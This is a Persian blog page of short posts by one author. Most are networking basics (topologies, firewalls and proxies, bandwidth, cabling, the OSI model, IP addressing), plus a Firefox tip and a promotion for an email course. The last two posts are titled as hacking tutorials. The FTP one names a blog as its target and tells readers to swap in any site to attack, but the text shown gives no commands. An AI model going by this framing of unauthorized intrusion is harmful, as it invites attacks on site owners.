پیغام مدیر :
با سلام خدمت شما بازديدكننده گرامي ، خوش آمدید به سایت من . لطفا براي هرچه بهتر شدن مطالب اين وب سایت ، ما را از نظرات و پيشنهادات خود آگاه سازيد و به ما را در بهتر شدن كيفيت مطالب ياري کنید.
بازدید : 50
نویسنده : مولوی

این مطلب هم درباره گوگل باز است دراین پست قصد آموزش اضافه کردن Google buzz به سایدبار فایرفاکس بدون نصب افزونه ای را دارم.

اگر از فایرفاکس استفاده می کنید و می خواهید گوگل باز را در ساید بار مرورگر خود داشته باشید و به راحتی آن را مدیریت کنید به روش زیر عمل کنید:

+ فایرفاکس خود را باز کنید و برروی نوار بوکمارک آن راست کلیک کرده ، گزینه New Bookmark را انتخاب کنید.

+ در پنجره باز شده در text box مقابل Name تایپ کنید : Google Buzz

+ در تکس باکس Location آدرس زیر را وارد کنید:

https://m.google.com/app/buzz?source=mog&gl=us&force=1#~buzz:view=following

+ چک باکس Load this bookmark in the sidebar را تیک بزنید.

در آخر برروی دکمه Add کلیک کنید تا کار تمام شود. برای دسترسی به گوگل بازدر سایدبار روباه آتشین کافیست برروی دکمه بوکمارکی که به روش بالا ایجاد نموده اید کلیک کنید تا آن را در سایدر بار تجربه کنید.


:: موضوعات مرتبط: نرم افزار , اینترنت , وبلاگ نویسان , ترفندستان , آموزش های کاربردی , ,



بازدید : 38
نویسنده : مولوی

امروزه مزیت دوره های آموزشی انلاین بر هیچ کس پوشیده نیست .دیگر به جای صرف وقت و هزینه و ترافیک در پشت رایانه خود نشسته و از کلاس درس لذت ببرید . البته این کلاس درسی که امروز میخواهم کمی فرق دارد . این سایت کلاس های درس را در ایمیل شما برگزار می کند . درسنامه، وب ‌سایت آموزش از راه دور بر مبنای ایمیل است که کاربران می‌توانند با دریافت واحدهای آموزشی از طریق ایمیل و بدون مراجعه به وب‌سایت درسنامه، درس‌ها را خوانده و در آزمون‌ها شرکت کنند.

مزیت درسنامه بر دیگر سیستم‌های آموزشی از راه دور در روش ارتباط با کارآموزان است. در روش‌های متداول آموزشی در دنیا، کاربران برای مشاهده و شرکت در آزمون باید به وب‌سایت خاصی مراجعه کنند، اما در درسنامه تمامی این کارها در ایمیل کاربر صورت می‌گیرد و کاربر نیاز به مراجعه به وب‌سایت درسنامه ندارد.

ثبت نام در دوره های درسنامه رایگان و بسیار آسان است تنها کافیست یک ایمیل خالی به آدرس help@darsnameh.com بفرستید تا دوره های آموزشی برایتان ارسال و به سادگی ثبت نامه کنید .

در حال حاضر دو دوره آموزشی در حال برگزاری است که عبارتند از : دوره آموزشی مقدماتی- آشنایی با حرفه‌ی روزنامه‌نگاری و دوره آموزشی وبلاگ نویسی که هر مبحث پس از ثبت نام برای شما طبق برنامه زمان بندی شده به ایمیلتان ارسال و در گایان هر مبحث آزمونی برگزار میشود که محل آزمون هم همان وبلاگ شماست .

جالب است بدانید در پایان هر دوره‌ی آموزشی یک آزمون نهایی از شما گرفته می‌شود. در صورت دریافت نمره‌ی قبولی می‌توانید گواهی شرکت در دوره‌ی آموزشی را به صورت فایل دریافت نمایید. ‏ ‏

فرصت را از دست ندهید و همین الان در کلاس های درسنامه ثبت نام کنید.

آدرس :  http://www.darsnameh.com


:: موضوعات مرتبط: اینترنت , آموزش های کاربردی , ,



مركزى براى امنیت شبكه Network Security
نوشته شده در 20 آبان 1389
بازدید : 37
نویسنده : مولوی

امروزه استفاده از تكنولوژى شبكه اهمیت بسیار زیادى دارد و این اهمیت براى شركت هاى تجارى كه مى خواهند در بازار رقابت باقى بمانند دو چندان است. در واقع سیستم عامل هاى جدید نیاز به مكانیسم هایى براى مدیریت اشیا و روابط توزیع شده در محیط شبكه دارند. Directory Service مكانى است براى ذخیره سازى اطلاعات در مورد كلیت شبكه، مثل برنامه هاى كاربردى، فایل ها، پرینترها و كاربران. بر همین اساس سرویس Active Directory یك راه مطمئن براى نامگذارى، تشریح، محل قرارگیرى، نحوه دسترسى، مدیریت ایمنى و اطلاعات در مورد این منابع را فراهم مى سازد. با این وجود Active Directory مانند یك تقسیم كننده اصلى در سیستم عامل شبكه كار مى كند. از سوى دیگر این سرویس مركزى براى مدیریت سیستم ها و رابط بین این منابع توزیع شده است. اكتیو دایركتورى به خاطر اینكه این توابع اصلى را براى سیستم عامل فراهم كند مى بایست با سیستم هاى مدیریتى و مكانیسم هاى ایمنى سیستم عامل شبكه در ارتباط باشد تا درستى اطلاعات و اختصاصى بودن آن را تضمین نماید. Directory Service نیز نقش مهمى را در توانایى شركت ها براى تعریف و نگهدارى زیربناى شبكه، اجراى مدیریت سیستم و كنترل تمام تجاربى را كه كاربران از سیستم هاى اطلاعاتى شركت به دست مى آورند بر عهده دارد.


:: موضوعات مرتبط: اینترنت , ,



تنظیم یک Firewall
نوشته شده در 20 آبان 1389
بازدید : 41
نویسنده : مولوی

نرم افزاراست که برروی یک کامپیوترنصب می شود تا جلوی ترافیک های ناخواسته رابگیرد. شما می توانید نرم افزارهای رایگان firewall رابرای استفاده بروی کامپیوترهای خود ازاینترنت منتقل کنید . همه این نرم افزارها کارمشترکی انجام می دهند امانوع firewall مورد نیازشمابرای محافظت ازشبکه LAN خودمیتواند کمی پیچیده باشد .یک firewall بنابه ذات خود،ورودکاربرانی که می خواهند به سیستم شما دستیابی پیدانمایند راکنترل می نماید . یک وجود دارد می باشد چنین firewall هایی ممولاً دارای 2 کارت شبکه هستند وsandbox نامیده میشوند.

این شبکه معمولاءدارای کانکتورجداگانه می باشد که بسته های اطلاعاتی راازدستگاه مسیریاب ( router ) دریافت نموده وبه کانکتورجداگانه بروی اولین کارت شبکه firewall ارسال می نماید . این بسته های اطلاعاتی ازنظرمجازبوده و اجاره داشتن برای استفاده ازشبکه داخلی کنترول می شوند. اگرآنهامجازشناخته نشوند نادیده گرفته خواهند شد. درصورتی که مجازشناخته شوند ازطریق کارت شبکه دوم ارسال خواهند شد . وبه این ترتیب اجازه می یابند به شبکه داخلی دسترسی پیدا کنند.

این نوع firewall خوب ومناسب است اماراه بهترانجام آن به وسیله سرورپراکسی می باشد .درصورتی که شبکه شما ازTCP/IP استفاده می کند ( که اغلب شبکه هاهمین طورند) هرگاه کامپیوتردارای آدرس منحصربه فردی می باشد.این آدرس هابه کاربران غیرمجازمی توانداجازه ورود به شبکه داخلی رابدهد .چگونه می توان جلوی این کارراگرفت .

سرورهای پراکسی پاسخ این پرسش هستند چون آنها آدرس های IP رابرای جهان خارج غیرقابل رویت می کنند. یک سرورپراکسی پاسخ بین شبکه داخلی وشبکه خارجی قرارمی گیرد ونقش واسطه ای را ایفا می کند که ترافیک های ورودی و خروجی راتغیرمی دهد .نرم افزارTCP/IP هرکامپیوترباید به گونه ای تنظیم شود که  به دنبال یک سرورپراکسی درآدرس IP خاصی بگردد.هنگامی که کاربری برروی یک آدرس اینترنت کلیک کنید بسته های اطلاعاتی مستقیمآ ازطریق firewall به سایت وب فرستاده نمیشود نرم افزارپراکسی تقاضای کامپیوترداخلی رادریافت نموده درخواستها ازکامپیوترمقصد رااستخراج نموده وهمان تقاضاهاراارسال می نماید.نکته دراینجا این است که تقاضابه همراه آدرسIP سرورپراکسی ارسال می شود نه باادرس IP کامپیوترداخلی هرکس خارج ازشبکه داخلی فقط آدرس سرورپراکسی (proxy) رامی بینید وهیچ یک از ادرس های IP کامپیوترهای داخلی رانخواخد دید.

سرورپراکسی بسته های اطلاعاتی ورودی رادریافت نموه آدرس IP آنهارایاداشت نموده وبکاربری که آدرس دهی شده ارسال می نماید. انواع بسیارمتنوع firewall وبسته های نرم افزاری مختلفی برای این منظورپیاده سازی شده است . شما می توانید برروی کامپیوترخود یک firewall بسیارپیچیده نصب کنیدویا ازسرورپراکسی برای محافطت ازکل شبکه LAN خوداستفاده نمایید .انواع مختلف پیکربندی ها بسیارزیاد است وشرح همه آنها دریک فصل امکان پذیرنمی باشد.

تعدادزیادی HOWTO واطلاعات دیگروجود دارد که به شما نشان می دهند چگونه firewall مورد نیازخود را تنظیم نمایید .دیدن سایت ردهت قبل ازهرجای دیگرتوصیه می شود .قسمت پشتیبانی (support) برابرای دیدن مطالب مربوط به             firewall  ببینید. این قسمت سایت رسمی پروژه firewall لینوکس است که جدید ترین اطلاعات مربوط به firewall را دارد.


:: موضوعات مرتبط: اینترنت , ,



ساختا ر شبکه Network Topologies
نوشته شده در 20 آبان 1389
بازدید : 54
نویسنده : مولوی

هدف از ساختار شبکه ساختمان فزیکی و ساختمان منطقی شبکه است یا به عباره دیگر در ساختار شبکه دو بخش ذیل شامل است .

·                    ساختار فزیکی Physical Topology

·                    ساختار منطقی logical topology

ساختار فزیکی ، شکل فزیکی و حقیقی شبکه را تعریف میکند . این ساختار طرزوصل شدن کمپیوتر ها را تعین مینماید .

ساختار های فزیکی مروجه قرار قرار ذیل میباشند

ساختار بس BUS

این ساختار یک کیبل عمومی را استفاده نموده و تمام کمپیوتر ها توسط کیبل های فرعی به این کیبل عمومی وصل میگردد کیبل عمومی را بنام segment, Backbone, Trunk  هم یاد میکند شکل ذیل ساختار بس را نشان میدهد در این ساختار برای وصل کردن کمپیوتر ها ازهب یا سویچ استفاده نمیگردد . بلکه صرف از کیبل استفاده میشود . به چندین شکل تطبیق شده میتواند شکل مشهور آن استفاده از متصل کننده که به  شکل T  است میباشد . در این ساختار معمولاً ز کیبل کویکسل coaxial استفاده میشود . از متصل کننده BNC در NIC و همچنین در قسمت متصل کننده شکل T استفاده میشود . در یک وقت صرف یک کمپیوتر میتواند داده را روان کند هر دو طرف کیبل عمومی باید توسط پایان دهنده TERMINATER پایان داده شود . در صورتیکه در هردو طرف کیبل پاییان دهنده نباشد . سگنال از یک طرف کیبل دوباره به طرف داخل می آید . در صورت موجودیت پایان دهنده در هر دو طرف کیبل سگنال توسط پایان دهنده جذب گردیده و کیبل از آن خالی میشود . مصرف کم نصب Installation آن آسان و عدم ضرورت به سویچ از فواید این ساختار میباشد . نقص این ساختار این است که در صورت قطع شدن کیبل از یک قسمت آن سبب قطع شدن ارتباط عمومی در شبکه میشود . هم چنین یافتن وحل مشکلات میباشد . اگر ترافیک زیاد باشد سرعت آن کم وقابلیت توسعه آن نیز کم است

 

ساختار حلقه Ring

 در این ساختار هرکمپیوتر به دو کمپیوتر دیگر وصل گردیده که در نتجیه ساختار حلقوی ایجاد میگردد

شکل ذیل ساختار Ring را نشان میدهد .

 

ساختار ستاره Star

این ساختار مشابه به ساختار ستاره توسعه یافته Extended Star بوده و تنها به عوض وصل کردن هب ها یا سویچ ها سیستمی که شبکه را کنترول میکند ( مانند سرور ها )  باهم وصل میگردد .  در این ساختار وسایل به اساس یک تسلسل Hierarchy  با هم وصل میشود . شکل ذیل ساختار سلسله ای را نشان میدهد

 

ساختار Mesh

در این ساختار هر کمپیوتر به تمام کمپیوتر های داخل شبکه به شکل مستقیم وصل میگردد . در این ساختار از هر کمپیوتر به تمام کمپیوتر های دیگر که در شبکه اند راه مستقل موجودیت از این ساختار در صورتیکه ارتباطات کمپیوتر ها در شبکه نهایت مهم باشد و نیابد قطع گردد . استفاده میشود شکل ذیل ساختارStar  ر ا  نشان میدهد . طوریکه در شکل دیده میشود . در این ساختار هر کمپیوتر به هر کمپیوتر دیگر به شکل جداگانه وصل است . اگر یک کیبل قطع هم شود ازکیبل دیگر استفاده شده میتواند انترنیت یک مثال خوب Mesh  است .


:: موضوعات مرتبط: اینترنت , ,



منطقی شبکه logical Topology
نوشته شده در 20 آبان 1389
بازدید : 46
نویسنده : مولوی

ساختار منطقی شبکه طرز استفاده کمپیوتر ها را از وسایل انتقال داده مانند کیبل را تعیین و کنترول میکند . ساختار ها منطقی که در شبکه های محلی Local Area Network  یا استفاده میشود قرار ذیل اند .

  •      ساختار توزیعی Broadest
  •      ساختار Token Passing

در ساختار توزیعی هر host  های دیگر داده خود را بالای وسیله شبکه روان میکند . Hostها میتواند بدون در نظر گرفتن نوبت داده خود را روان کند تکنالوژی Ethernet به همین اساس کار میکند.

در ساختار  Token Ring یک سگنال ا لکترونیکی که بنام Token  یاد میشود ، به شکل دورانی در شبکه از یک Host  به  Host  دیگر میرود.اگر Host  معلومات داده برای فرستادن نداشته باشد . Token را به host دیگر پاس میدهد. تکنالوژی token Ring  و

 (Fiber Distributed داده Interface)  FDDI   از همین ساختار منطقی استفاده میکند.

ظرفیت ارتباط ‌‌‌ Bandwidth

مقدار معلومات یکه در یک لین شبکه در یک وقت معین جریان پیدا کرده میتواند به نام ظرفیت ارتباط یاد میشود . وقتیکه با شبکه سروکار داریم باید روی دلایل ذیل ظرفیت ارتباط را بفهمیم .

1 . ظرفیت ارتباط محدود Finite  است قوانین فزیکی و تکنالوژی ، ظرفیت ارتباط را محدود میسازد نظربه ساختمان فزیکی یک وسیله ظرفیت ارتباط وسایل Media  فرق میکند . وهمچنین تکنالوژی به چه سرعت میتواند . داده را بالای Media قرار دهد مثلاً سرعت مودیم modem در صورت استفاده از کیبل TP Twisted Pair   را 56Kbps محدود است تکنالوژی DSL (Digital Subscriber Line) هم از کیبل TP استفاده میکند ولی دارای سرعت بیشتر است. کیبل نوری فایبر Fiber Optic  نظربه توانایی فزیکی خود در تیوری دارای ظرفیت ارتباط نا محدود بوده ولی ظرفیت ارتبا ط حقیقی توسط تکنالوژی که داده  را بالای فایبر می گذارد مربوط مشود .

2.      ظرفیت ارتباط مفت نیست . برای  LAN میتوانیم از وسایل استفاده کینم . که دارای ظرفیت ارتباط زیاد باشد ولی در WAN باید ظرفیت ارتباط را ازتهیه کننده گان خدمات انترنیت یا ISP  ( Internet Services Provider) خریداری نمایم پس مهم است تا ظرفیت ارتباط را بفهمیم . 

3.      ظرفیت ارتباط یک عامل مهم در اثنای بررسی و تحلیل اجراات شبکه میباشد . هم چنین در اثنای دیزاین شبکه های جدید نیز ظرفیت ارتباط دارای اهمیت میباشد

4.      ضرورت به ظرفیت  ارتباط روز به روز زیاد میشود . هرقدر که تکنالوژی سریع به میان می آید . به همان اندازه پروگرام ها پیشرفت نموده وبه ظرفیت ارتباط زیاد ضرورت پیدا میکند .

برای درک بهتر مفهوم ظرفیت ارتباط شبکه آب را مثال آورده میتوانیم . در شبکه آب نل هایکه دارای  قطر متفاوت است جهت رساندن آب استفاده میشود . قطر نل را میتوانیم . با ظرفیت ارتباط مقایسه نماییم .

واحد قیاسی برای ظرفیت ارتباط در عبور رقمی Digital Transmission  به بت در یک ثانیه bit per second  BPS

  اندازه میشود . واحدات بزرگتر آن عبارت اند از  :

 کیلو بت در ثانیه Kbps

میگا بت در ثانیه Mbps

گیگا بت در ثانیه Gbps

ترابت در ثانیه Tbps

جدول ذیل واحدات رانشان میدهد .

 

Unit of Bandwidth Abbreviation Equivalence                           

 

1 bps = fundamental unit of bandwidth          

Bps    

Bite per second

 1 kbps = 1,000 bps = 103 bps                                                                      

Kbps  

Kilobits per second      

 1 mega = 1,000,000 pbs = 106 bps                   

Mpbs 

Mega bots per second  

1 Giga = 1,000,000,000 bps = 109bps              

Gpbs  

Gigabits per second     

 1 Terabits= 1,000,000,000,000 bps = 1012 bps

Tpbs  

Terabits per second     

       
 
 توان عملیاتی   (Throughput)

توان عملیاتی عبارت از ظرفیت ارتباط  حقیقی و اندازه شده است . در وقت معین از روز در راه معین شبکه ودر اثنای که نوع معین از داده را به کمپیوتر خود می آوریم یعنی توان عملیاتی عبارت از مقدار معلومات است که به کمپیوتر ما می آید . وظرفیت ارتباط عبارت از مقدار معلومات است که آمده میتواند . قطر نل آب را با ظرفیت ارتباط ، وو مقدار آب که می آید به توان عملیاتی مقایسه کرده میتوانیم . توان عملیاتی همیشه کمتر از ظرفیت ارتباط میباشد . عوامل ذیل توان عملیاتی را تعین میکند .

1.                وسایل شبکه

2.                نوع داده

3.                ساختار شبکه

4.                تعداد استفاده کننده گان شبکه

5.                نوع کمپیوتر استفاده کننده .

6.                نوع کمپیوتر سرور

7.                شرایط برق 

برای محاسبه نمودن وقت عبور دادن داده وفایل ها نیز از ظرفیت ارتباط Bandwidth و توان عملیاتی Throughput استفاده میشود . برای این محاسبه از دو فورمول ذیل استفاده کرده میتوانیم .

در فورمول فوق :

T: وقت مورد ضرورت برای عبوردادن داده

S: مقدار معلومات

BW: ظرفیت ارتباط

P: توان عملیاتی


:: موضوعات مرتبط: اینترنت , ,



عبور رقمی Digital و قیاس Analog
نوشته شده در 20 آبان 1389
بازدید : 49
نویسنده : مولوی

سیستم ها رادیو ، تلویزیون و تلیفون ها از هوا سیم و امواج الکترو مقناطیسی استفاده میکند . شکل این امواج مانند شکل امواج  روشنی و صوت است . ازهمین سبب بنام امواج قیاسی یاد میشود . همچنین این امواج مانند امواج روشنی و صوت شکل و اندازه خود را تغیر میدهد .

ظرفیت ارتباط قیاسی ، توسط مقدار طیف الکترو مقناطیسی Electromagnetic Spectrum   که توسط سگنال اشغال میشود اندازه میگردد . و احد قیاسی آن هرتز Hertz میباشد . هرتز عبارت از تعداد دوران ها در یک ثانیه بوده که بنام فریکانس هم یاد میشود .

واحدات بزرگتر آن قرار ذیل است . کیلو هرتز میگاهرتز و گیگاهرتز .عبور رقمی Digital ، نظربه عبور قیاسی Analog دارای مزایای ذیل میباشد .

سگنال و یدیویی انالوگ که به فریکانسهای بیتشرضرورت دارد ، نمی تواند در باند کو چک آن عبور داده شود . ولی در عبور رقمی تمام معلومات (تصویر و صدا و معلومات ) به شکل بت ها بوده ومی تواند در هر  Bandwidth انتقال داده شود . عبور رقمی نظربه عبور رقمی کمتر دچار غلطی ها میشود.

ارتباط دو طرفه و یک طرفه Half – Duplex& Full – Duplex

 

وسایل میتواند به دوشکل ارتباط برقرار نماید :یک طرفه همزمان  Half – Duplex

دوطرفه همزمان در روش Half – Duplex یک وسیله نمیتواند همزمان هم معلومات را اخذ (Receive ) و هم ارسال transmit  نماید . یعنی وقتیکه از جانب مقابل معلومات برایش می آید در آن وقت معلومات را فرستاده نمیتواند و وقتیکه معلومات را روان میکند در آن وقت معلومات را گرفته نمیتواند . پروتوکول ایتر نت Ethernet   اولی سابقه که در آن از کیبل کویکسل Coaxial استفاده گردیده بود . به روش یکطرفه همزمان Half – Duplex کار میکرد . در Half – Duplex در یک وقت صرف یک وسیله میتواند از کیبل استفاده نماید . اگر در عین وقت دو وسیله معلومات را روان کند ، سبب تصادم Collision  معلومات میشود . در صورت وقوع Collision وسیله که اول از Collision خبر میشود یک سگنال را جهت خبر ساختن دیگر وسایل در شبکه روان میکند. این سگنال را بنام Jam Signal یاد مینماید . بعد از شنیدن این سگنال تمام وسایل برای مدتی از فرستان معلومات خود داری میکند .

در روش  Full – Duplex یک وسیله میتواند همزمان هم معلومات را اخذ(Receive ) و هم ارسال transmitنماید . در روش تصادم Collision واقع نمیشود .شکل ذیل عبور Full – Duplex را نشان میدهد .حالت Half – Duplexو Full – Duplex مربوط به دو چیز میگردد .مربوط به کییل Mediaمربوط به وسایل شبکه مانند سویچ و NICکیبل های UTP ، STP وفایبر ، هم به شکل Half – Duplex وهم ه شکل Full – Duplex کار میکند . این نوع کیبل ها را ه های جداگانه برای رفت و آمد داده دارد . ولی کیبل های Coaxial تنها به شکل Half – Duplex کارکرده میتواند .

همچنین وسایل شبکه مانند سویچ وکارت شبکه NIC و هم میتواند به شکل و هم به شکل Full – Duplex کارنماید . قابل یاد آوری است که در اثنای ارتباط ، باید هر دوطرف ارتباط یابه شکل

  Half – Duplex و یابه شکل Full – Duplexکار نماید. وسایل که میتواند به هر دو روش کار کند از طریق پروسه که بنام Auto –negotiation  یاد میشود همرای جانب مقابل خود را عیار میسازد . برای عیار ساختن کارت شبکه به روش Half – Duplex ویا Full – Duplex طور ذیل عمل کنید .

1.                    بعد از آن ، از دکمه Advanced بالای speed & Duplex فشار آورده در آنجا سرعت از صفحه کنترولی Control Panel  ویندوز ، بالای اختیار system ، از آنجا بالای Hard ware و بعد از آن بالای device Manager فشار آورید .

2.                بالای علامه + که همرای Network  Adapter است فشار آورده و بعد از آن ،توسط دکمه طرف راست موس بالای کارت شبکه فشار آورده و از مینوی که ظاهر مگردد . بالای Properties فشار آورید .

3.                و حالت Duplex  مورد نظر خود را تعین نمایند .


:: موضوعات مرتبط: اینترنت , ,



رسانه ها Media
نوشته شده در 20 آبان 1389
بازدید : 48
نویسنده : مولوی

رسانه در شبکه به دو شکل میباشد.

1-   Wireless

2-   Wired

Wireless Media:

برای ارتباط دادن چندین کمپیوتر یعنی (برای شبکه ساختن) چندین راه های وجود دارد اما این طریقه ارتباط دادن چندین کمپیوتر با سهولت تر میباشد بخاطری که بدون لین کمپیوترها با همدیگر ارتباط میگیرند.پس گفته میتوانیم زمان که کمپیوترها با هم دیگر بدون لین ارتباط  داده شده باشند همان شبکه را بنام شبکه بیسیم یاد میکنند.        

Wire Media

این نوع رسانه توسط لین تشکیل میگردد یعنی زمان که شما شبکه را میسازید اگر کمپیوترها توسط یک لین با هم دیگر ارتباط گرفته باشند پس گفته میتوانیم که این شبکه Wired یعنی سیمی است و برای نیتورک ساختن چندین رقم کیبل ها وجود دارد.

1-                 UTP

2-                 Coaxial

3-                 Fiber Optic

UTP: مخفف Unshielded Twisted Pairs یعنی جوره های پیچ خورده گی بی پوش است که این کیبل به پنج دسته تقسیم شده است و از این کیبل در شبکه های امروزی زیادتر استفاده میکنند.

           


کیبل UTP   

1-    Category 1 = این کیبل UTP 90 % برای تیلیفون ها استفاده میشد که صرف صدا را انتقال میداد.

2-    Category 2 = این کیبل UTP  برای انتقال دادن معلومات استفاده میشود که دارای چهار جوره و سرعتش 4 M bps میباشد.

3-    Category 3 = این کیبل UTP برای انتقال دادن معلومات استفاده میشود که دارای چهار جوره و سرعتش 10 M bps میباشد.

4-    Category 4 = این کیبل UTP برای انتقال دادن معلومات استفاده میشود که دارای چهار جوره و سرعتش 16 M bps میباشد.

5-    Category 5 = این کیبل UTP برای انتقال دادن معلومات استفاده میشود که  دارای چهار جوره

مسی و سرعتش 100 M bps میباشد.

نوت: در این کیبل از ارتباط دهنده های(Connector)  Rj45 استفاده میکنند.

 


:: موضوعات مرتبط: اینترنت , ,



کیبل نوری FIBER OPTIC
نوشته شده در 20 آبان 1389
بازدید : 52
نویسنده : مولوی

در کیبل های مسی کیبل های کویکسل و کیبل UTP انتقال دادهتوسط سیگنال الکتریکی صورت میگیرد .در کیبل های نوری انتقال دادهتوسط نور LIGHT صورت میگیرد .

نور یک نوع انرژی الکترومقناطیسی است که در کیبل فایبر میتواند دادهرا انتقال دهد.
 
 

تداخلات و مزاحمت های بیرونی بالای کیبل نوری تاثیر ندارد . ولی سیگنال بعد از طی نمودن مسافه

درکیبل نوری هم ضعیف میگردد .  روشنی که در کیبل های نوری جهت انتقال دادهاستفاده میشود .

ازنوع انرژی الکترومقناطیسی است این انرژی در حقیقت موج الکترومقناطیس است و میتواند در خلا

،هوا ،و بعضی مواد مانند شیشه حرکت نمایند .  یک صفت مهم این امواج طول  موج آن میباشد

در حقیقت تمام انواع امواج الکترومقناطیسی دارای طول موج فریکانس مختلف ولی سرعت آنها

مساوی است . سرعت این امواج در خلا 300000 کیلو متر در یک ثانیه است . طول موج این

امواج از 1000000000متر تا به 0.000000000000001 متر میباشد فریکانس آنها از یک

هرتز تا 1024 هرتز است اگر این امواج را به اساس طول موج  آنها بشکل تنازلی مرتب نمایم ،

این شکل مرتب آنها را بنام طیف امواج الکترومقناطیسی elector magnetic spectrum  

یاد میکند در طیف الکترومقناطیسی امواج به ترتیب طول موج شان به شکل ذیل قراردارد :

امواج برقی و تیلیفون power &telephone waves  امواج رادیویی radio Wave

مایکروویو Micro waves امواج تحت قرمز infrared امواج قابل رویت visible light

  امواج ماورا بنفش یا ultra Violet    X-Ray  و gamma Ray  امواج قابل رویت توسط

چشم انسان قابل رویت بوده و برای انتقال دادهاستفادهشده نمیتواند متباقی امواج توسط چشم

انسان قابل رویت نبوده و برای انتقال دادهاستفاده شده میتواند کیبل نوری دارای پنج قسمت ذیل

میباشد .

هسته یا Core هسته کیبل نوری ازشیشه بوده وظیفه آن انتقال سیگنال است

 


:: موضوعات مرتبط: اینترنت , ,



رنگ آمیزی Color Coding
نوشته شده در 20 آبان 1389
بازدید : 67
نویسنده : مولوی

در این روزها عمومآ شبکه ها از کیبل UTP ساخته میشوند و برای شبکه ساختن به کیبل های ترتیب شده UTP ضرورت است همچنان تمام کیبل های شبکه به دو شکل رنگ آمیزی میگردند.

1-    Cross Cable

2-    Straight Cable

Cross Cable: زمان که شما یک کمپیوتر را به کمیپوتر دیگر بدون کدام وسیله خواسته باشید که ارتباط بدهید از رنگ آمیزی ذیل استفاده نمائید یعنی این کیبل صرف برای ارتباط دادن دو کمپیوتر استفاده میشود.



 

Straight Cable: اگر شما خواسته باشید که چندین کمپیوتر را توسط Switch یا Hub ارتباط بدهید از رنگ آمیزی Straight کیبل استفاده نمائید یعنی زمان که دو آله مختلف را با هم ارتباط دادین از رنگ آمیزی ذیل استفاده نمائید.


  


:: موضوعات مرتبط: اینترنت , ,



Open System Interconnection
نوشته شده در 20 آبان 1389
بازدید : 42
نویسنده : مولوی

شبکه های کمپیوتری درسال های 1980 توسعه بیشتر پیدا کرد در هر قسمت دنیا شبکه های کمپیوتری ایجاد گردید وضرورت به این شد تا این شبکه ها ، که تکنالوژی های مختلف در آن بکار رفته بود ، باهم وصل شود در آن زمان معیار ها standards برای وسایل شبکه به شکل درست تعریف نگردیده بود . درشبکه ها ، وسایل نا موافق Incompatible به میان آمد و این وسایل مختلف بدون معیار ها standards نمی توانست باهم ارتباط برقرار نماید از همین سبب در دهه 1980 کمپنی ها به مشکل وصل کردن standardization Organization که یک ارگان بین المللی برای بوجود آوردن معیار ها است ، مادل های مانند TCP/IP,SNA, Decent رامورد مطالعه و تحقیق قرار داد . تا یک راه حل درست وقابل تطبیق برای حل این مشکلات ایجاد نماید . به این منظور ISO مادل OSI را درسال 1984 به میان آورد در این مادل تولید کننده گان وسایل باید مجموعه ازستندرد ها یا معیار ها را درنظر گرفته و وسایل شبکه را تولید نمایئد.در مادل OSI برای کم ساختن پیچیده گی ، ارتباطات وسایل در شبکه های کمپیوتری به هفت لایه / مرحله layer تقسیم گردیده است . این هفت لایه قرار ذیل میباشد .

هر لایه دارای ستندرد ها و پروتوکول ها ی معین میباشد . که مربوط همان لایه بوده و طرز کار وسایل رادر امور مربوطه همان لایه کنترول ومعیاری مینماید . تقسیم ارتباطات وسایل در شبکه های کمپیوتری به لایه ها دارای مزایای ذیل میباشد .پیچیده گی کم میشود .این تقسیم انترفس ها را ستندرد میکند .

انجنیری مادیولی Modular Engineering را ایجاد میکند .

تکنالوژی های متفاوت میتواند باهم کارکند .تدریس شبکه ها ووسایل شبکه را آسان میکند


:: موضوعات مرتبط: اینترنت , ,



آدرس هاي آیپی IP Addresses
نوشته شده در 20 آبان 1389
بازدید : 48
نویسنده : مولوی

کمپيوتر ها ووسائل ديگر در  Network  داراي آدرس فزيکي بوده و بنام آدرس  MAC  ياد ميشود. آدرس MAC بالاي NIC بوده و در اثناي شروع کمپيوتر در مرحله که NIC  توسط بايوس (BIOS)  شناخته ميشود. اين آدرس به RAM  کمپيوتر نقل ميگردد. آدرس MAC کمپيوتر تغير نميکند و تنها در صورت تغير دادن NIC ميتواند تغير داده شود. اين ادرس در لايه دوم  (Data Link Layer)  جهت شناخت انترفس ها استفاده ميشود. آدرس هاي  MAC  بدون ساختار (Structure)  بوده و نمي تواند جهت شناخت مجموعه از وسائل در يک  شبکه استفاده گردد. يا به عباره ديگر توسط آدرسهاي  MAC  نمي توانيم Network  را شناسائي نمائيم. هر وسيله بايد به شکل جداگانه شناخته شود.

از همين سبب آدرسهاي  IP  که وجود فزيکي نداشته بلکه به شکل منطقي ميباشد، استفاده ميگردد.  اين آدرس ها داراي  ساختار منطقي بوده وميتوانيم آنرا تغير دهيم. توسط اين آدرسها ميتوانيم  Network  ها را شناسائي کنيم. آدرسهاي  IP  را بنام  آدرس منطقي  (Logical Address)  و بنام آدرس Network   هم ياد ميکند.

آدرسهاي  IP  داراي نمونه ها بوده که نمونه چهارم  (IP v4) آن هنوز بيشتر مورد استفاده است. اين نمونه آدرسهاي  IP  در سال  1981   معرفي گرديد. نمونه که جديدا معرفي گرديده و بنام نمونه ششم  (IP v6)  ياد ميشود در آينده استفاده خواهد شد.  مادر اينجا صرف نمونه چهارم آدرسهاي   IP  را مورد بحث قرار ميدهيم.

آدرس هاي  IP v4  داراي  طول 32  بت بوده وهر آدرس به چهار بخش جدا گرديده است. هر بخش داراي هشت بت بوده و بنام  Octet  ياد ميشود(Octet  به معني هشت است).  هر Octet توسط نقطه از هم جدا ميگردد. هر Octet  ميتواند از صفر تا  255   قيمت اخذ نمايد.


:: موضوعات مرتبط: اینترنت , ,



هک از طریق پورت ۲۱ یا ftp
نوشته شده در 18 آبان 1389
بازدید : 40
نویسنده : مولوی

شما برای این کار می توانید از ابزار های به خصوصی مانند ftp clinet یا برنامه های از این قبیل استفاده
کنید اما من به لحاظ این که کار را راحت کنم آموزش این قسمت را به وسیله ی داس کامپیوتر که همه ی
شما بر روی کامپیوتر خود دارید و نیازی به دنالود یا نصب آن ندارید شروع می کنیم.مراحل کار به ترتیب زیر
نوشته شده است
۰-مثلا ما می خواهیم سایت www.saiedhackerpro.persianblog.com را به وسیله ی پورت ۲۱ هک کنیم .
اگر شما بخواهید سایت دیگری را هک کنید در هر جا که اسم سایت www.saiedhackerpro.persianblog.com نوشته شده بود را حذف کنید و اسم سایت مورد نظر را قرار دهید.


:: موضوعات مرتبط: نرم افزار , اینترنت , برنامه نویسی , ,



هک کردن از طریق داس
نوشته شده در 18 آبان 1389
بازدید : 33
نویسنده : مولوی

هک کردن آسان ، با داس
